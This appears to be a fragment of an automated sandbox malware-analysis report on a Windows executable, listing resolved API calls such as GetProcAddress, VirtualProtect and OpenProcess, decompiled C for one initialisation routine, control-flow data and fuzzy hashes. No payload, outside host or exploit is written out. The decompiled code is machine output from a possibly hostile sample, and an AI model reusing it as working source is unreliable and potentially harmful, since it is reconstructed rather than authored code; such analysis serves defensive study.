                                  0x0040187f
                                  0x0040189b
                                  0x004018ac
                                  0x004018b3
                                  0x00401911
                                  0x00000000
                                  0x004018b5
                                  0x004018b5
                                  0x004018bf
                                  0x004018c3
                                  0x004018c8
                                  0x004018cb
                                  0x004018d0
                                  0x004018d4
                                  0x004018d9
                                  0x004018de
                                  0x004018e2
                                  0x004018e7
                                  0x004018e8
                                  0x004018ec
                                  0x004018f1
                                  0x004018f9
                                  0x004018f9
                                  0x004018f1
                                  0x004018e2
                                  0x004018d4
                                  0x004018fb
                                  0x00401904
                                  0x00401908
                                  0x00401912
                                  0x00401918
                                  0x00401918

                                  APIs
                                    • Part of subcall function 00401B39: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004018B1,?,?,?,?,?,00000002,?,?), ref: 00401B5D
                                    • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401B7F
                                    • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401B95
                                    • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BAB
                                    • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BC1
                                    • Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BD7
                                    • Part of subcall function 0040134F: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401387
                                    • Part of subcall function 00401E3D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401E76
                                    • Part of subcall function 00401E3D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401EEB
                                    • Part of subcall function 00401E3D: GetLastError.KERNEL32 ref: 00401EF1
                                  • GetLastError.KERNEL32(?,?), ref: 004018F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
                                  • String ID:
                                  • API String ID: 3135819546-0
                                  • Opcode ID: 55e36e603ecf1f375935bfc2b6faf8baf07d13715f36cfb61c3d334d7de0f626
                                  • Instruction ID: 2a630c9bca26b312d1a6089272dc605b797118c6fb065e3c503f4e5450e97ac4
                                  • Opcode Fuzzy Hash: 55e36e603ecf1f375935bfc2b6faf8baf07d13715f36cfb61c3d334d7de0f626
                                  • Instruction Fuzzy Hash: 50113B77600701ABD721BBA9CC80CAF77BCAF88304700413EEA42B7661EAB4ED058794
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 182 4012b0-4012cc CreateEventA 183 401322-401323 GetLastError 182->183 184 4012ce-4012d6 GetVersion 182->184 185 4012e3 184->185 186 4012d8-4012df 184->186 188 4012e5-401310 GetCurrentProcessId OpenProcess 185->188 189 40131d-401321 185->189 187 4012e1 186->187 186->188 187->185 190 401312 188->190 191 401319-40131c 188->191 190->191
                                  C-Code - Quality: 100%
                                  			E004012B0() {
                                  				void* _t1;
                                  				unsigned int _t3;
                                  				void* _t4;
                                  				long _t5;
                                  				void* _t6;
                                  				intOrPtr _t10;
                                  				void* _t14;
                                  
                                  				_t10 =  *0x403170;
                                  				_t1 = CreateEventA(0, 1, 0, 0);
                                  				 *0x40317c = _t1;
                                  				if(_t1 == 0) {
                                  					return GetLastError();
                                  				}
                                  				_t3 = GetVersion();
                                  				if(_t3 != 5) {
                                  					L4:
                                  					if(_t14 <= 0) {
                                  						_t4 = 0x32;
                                  						return _t4;
                                  					} else {
                                  						goto L5;
                                  					}
                                  				} else {
                                  					if(_t3 >> 8 > 0) {
                                  						L5:
                                  						 *0x40316c = _t3;
                                  						_t5 = GetCurrentProcessId();
                                  						 *0x403168 = _t5;
                                  						 *0x403170 = _t10;
                                  						_t6 = OpenProcess(0x10047a, 0, _t5);
                                  						 *0x403164 = _t6;
                                  						if(_t6 == 0) {
                                  							 *0x403164 =  *0x403164 | 0xffffffff;
                                  						}
                                  						return 0;
                                  					} else {
                                  						_t14 = _t3 - _t3;
                                  						goto L4;
                                  					}
                                  				}
                                  			}










                                  0x004012b1
                                  0x004012bf
                                  0x004012c5
                                  0x004012cc
                                  0x00401323
                                  0x00401323
                                  0x004012ce
                                  0x004012d6
                                  0x004012e3
                                  0x004012e3
                                  0x0040131f
                                  0x00401321
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004012d8
                                  0x004012df
                                  0x004012e5
                                  0x004012e5
                                  0x004012ea
                                  0x004012f8
                                  0x004012fd
                                  0x00401303
                                  0x00401309
                                  0x00401310
                                  0x00401312
                                  0x00401312
                                  0x0040131c
                                  0x004012e1
                                  0x004012e1
                                  0x00000000
                                  0x004012e1
                                  0x004012df

                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0040149E), ref: 004012BF
                                  • GetVersion.KERNEL32 ref: 004012CE
                                  • GetCurrentProcessId.KERNEL32 ref: 004012EA
                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401303
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.569379603.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.569373572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569386485.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569391208.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.569396828.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_d2ef5.jbxd
                                  Similarity
                                  • API ID: Process$CreateCurrentEventOpenVersion
                                  • String ID:
                                  • API String ID: 845504543-0
                                  • Opcode ID: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
                                  • Instruction ID: b8cc09b8ad51b93fadf4e457bac6bf592bf8967fcaec5ad48abf734a1226aae7
                                  • Opcode Fuzzy Hash: bccdd13247b34069af90feaf87c411da224cdf72da21f721717c303359e1be4a
                                  • Instruction Fuzzy Hash: 4EF019309403019BE7209FB8BE1DB963BA9A749712F14017AE651FA2F0D7B48A41CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%